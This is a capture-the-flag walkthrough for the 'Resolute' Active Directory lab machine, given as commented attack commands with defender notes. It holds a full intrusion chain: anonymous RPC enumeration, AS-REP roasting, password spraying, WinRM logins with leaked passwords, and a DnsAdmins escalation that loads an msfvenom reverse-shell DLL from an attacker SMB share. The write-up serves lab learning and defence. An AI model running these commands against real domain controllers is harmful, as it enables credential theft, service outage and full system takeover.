Resolute
¡Hola, esta es la máquina Resolute! Let’s hack!
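RECON
# Single ICMP echo to see whether the host answers at all (Windows hosts often
# filter ICMP, which is why -Pn is used on the scans below).
ping -c 1 <IP>
# Full TCP sweep: SYN scan, every port, report only open ones, no DNS resolution,
# no host discovery, high packet rate, grepable output into the file "ports".
# This is loud on the wire — a NIDS or NetFlow baseline on the target network
# should flag a 65k-port sweep at this rate.
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
# extractports is a custom helper, not a standard tool: it pulls the open-port
# list out of the grepable nmap file — confirm how it is defined in your shell.
extractports <ports>
# Version + default-script scan of the discovered ports. The original line gave
# the port list as the *target* (no -p and no host), so nmap would have tried to
# resolve "<PORTS>" as a hostname; -p and the host are required.
nmap -sCV -p <PORTS> <IP> -oG services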
AD DOMAIN DETECTION
# crackmapexec's SMB banner prints the target's NetBIOS name, domain and OS
# build; the domain name is what the /etc/hosts entry below needs.
crackmapexec smb <IP>
# Root is needed to edit /etc/hosts.
sudo su
nvim /etc/hosts
# Line to add inside /etc/hosts (not a command): maps the target IP to its AD
# domain name so Kerberos/SMB tooling can resolve it without the target's DNS.
<IP> <DOMAIN>
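RCPCLIENT NULL SESSION
# Anonymous (null-session) SAMR enumeration over MS-RPC: -U '' -N is an empty
# user with no password. That this works on a DC is a hardening gap — the
# "Network access: Do not allow anonymous enumeration of SAM accounts and
# shares" policy should be enabled; defenders can spot it as ANONYMOUS LOGON
# (logon type 3) events on the DC coming from an unknown host.
# enumdomusers prints "user:[name] rid:[0x...]" lines: keep the bracketed
# fields, drop the hex RIDs, strip the brackets -> one username per line.
rpcclient -U '' <IP> -N -c enumdomusers | grep -oP '\[.*?\]' | grep -v 0x | tr -d '[]' > users.txt
# Domain groups with their RIDs.
rpcclient -U '' <IP> -N -c enumdomgroups
# Members of RID 0x200 (512 = Domain Admins). The original line had a typo
# ("queryfroupmem"), which rpcclient does not recognise as a command.
rpcclient -U '' <IP> -N -c querygroupmem 0x200
# Attributes of RID 0x1f4 (500 = the built-in Administrator account).
rpcclient -U '' <IP> -N -c queryuser 0x1f4
# Display-info dump of every account, including the Description attribute.
rpcclient -U '' <IP> -N -c querydispinfo
# A PASSWORD IS FOUND IN A DESCRIPTION FIELD.
# Defender note: the description attribute is readable by every principal that
# can bind (here: anonymous) — never store secrets there, and audit it regularly.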
TGT GETNPUSERS ENUM (ASREPROAST ATTACK)
# For each user in users.txt, request an AS-REP from the KDC without
# pre-authentication (-no-pass). Accounts flagged "Do not require Kerberos
# preauthentication" answer with material that can be cracked offline.
# Mitigation: keep pre-auth required on every account. Detection: TGT request
# events (4768) with pre-authentication type 0 — confirm against your audit policy.
impacket-GetNPUsers MEGABANK.LOCAL/ -no-pass -usersfile users.txt
VALIDATING CREDENTIALS (PASSWORD SPRAYING)
# One password tried against every user in users.txt; --continue-on-success
# keeps going after the first valid pair instead of stopping there. Every try
# is a logon event on the DC, so a burst of failures (4625 / 4771) from one
# source across many accounts is the detection signature, and an account
# lockout policy bounds how far a spray can get.
crackmapexec smb <IP> -u users.txt -p <PASSWORD> --continue-on-success
GRANTED ACCESS MELANIE USER
# Confirm the pair works over SMB and over WinRM; a successful WinRM login
# means an interactive shell is possible.
crackmapexec smb <IP> -u melanie -p '<PASSWORD>'
crackmapexec winrm <IP> -u melanie -p '<PASSWORD>'
# Interactive PowerShell session over WinRM. Defender note: WinRM logons from an
# unexpected source host typically show as network (type 3) logons on the target;
# membership in Remote Management Users should be reviewed like any admin group.
evil-winrm -i <IP> -u 'melanie' -p '<PASSWORD>'
whoami
FLAG USER.TXT
type C:\Users\melanie\Desktop\user.txt
AD LOCAL ENUM
# Commands run inside the WinRM session on the target, not on the attacker box.
# Token privileges of the current user.
whoami /priv
# User, groups and privileges in one listing.
whoami /all
# Domain groups, then domain users, then melanie's own group memberships.
net group
net user
net user melanie
AD LOCAL ENUM (DIRECTORIES)
cd C:\
# -Force also lists hidden/system entries, which is how PSTranscripts shows up.
dir -Force
cd PSTranscripts\20191203
dir -Force
# PowerShell transcription log: it records every command typed, including any
# credential passed on a command line. Defender note: transcripts capture
# secrets verbatim — the output directory must be restricted to administrators,
# and credentials should never be supplied as command-line arguments.
type PowerShell_transcript.RESOLUTE.0JuoBGhU.20191203063201.txt
# RYAN'S PASSWORD (R_PASSWORD) IS LEAKED IN THE TRANSCRIPT
GRANTED ACCESS RYAN USER
# Same validation as for melanie: SMB, then WinRM, then an interactive session.
crackmapexec smb <IP> -u ryan -p '<R_PASSWORD>'
crackmapexec winrm <IP> -u ryan -p '<R_PASSWORD>'
evil-winrm -i <IP> -u 'ryan' -p '<R_PASSWORD>'
whoami
AD LOCAL ENUM (DIRECTORIES)
# Inside the WinRM session: ryan's Desktop holds a note worth reading.
cd Desktop
dir
type note.txt
AD LOCAL ENUM
# Same enumeration as for melanie, now as ryan; the local-group listing is the
# interesting part this time.
whoami /priv
whoami /all
net group
net user
net user ryan
net localgroup
# DnsAdmins membership is what the next section relies on. Defender note: this
# group can effectively reach SYSTEM on a DC, so it should be empty or audited
# as strictly as Domain Admins.
net localgroup DnsAdmins
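ABUSING DNSADMINS GROUP (DNSCMD.EXE PRIVESC)
# ATTACKER MACHINE
# Reverse-shell payload built as a DLL; the DNS service loads it when it restarts.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o pwned.dll
# SHARE THE CURRENT DIRECTORY OVER SMB (impacket smbserver). $(pwd) is quoted so
# a working directory containing spaces does not split into extra arguments.
smbserver.py smbFolder "$(pwd)" -smb2support
# LISTENER FOR THE REVERSE SHELL
rlwrap nc -nlvp <PORT>
# VICTIM MACHINE
# A DnsAdmins member may set the DNS server's ServerLevelPluginDll value to a
# path of their choosing, here a UNC path to our share. Defender notes: keep
# DnsAdmins empty, alert on changes to that setting, alert on the DNS service
# being stopped/started outside maintenance windows, and treat outbound SMB
# from a DC to an unknown host as a strong signal in its own right.
dnscmd.exe /config /serverlevelplugindll \\<IP>\smbFolder\pwned.dll
# STOP THE DNS SERVICE (this is a DNS outage for the domain — availability
# monitoring should catch it)
sc.exe stop dns
# START THE DNS SERVICE (MAY NEED TO BE RUN SEVERAL TIMES)
sc.exe start dns
# REVERSE SHELL OBTAINED — the DNS service runs as SYSTEM, which is why root.txt
# is readable from it
whoami
FLAG ROOT.TXT
type C:\Users\Administrator\Desktop\root.txt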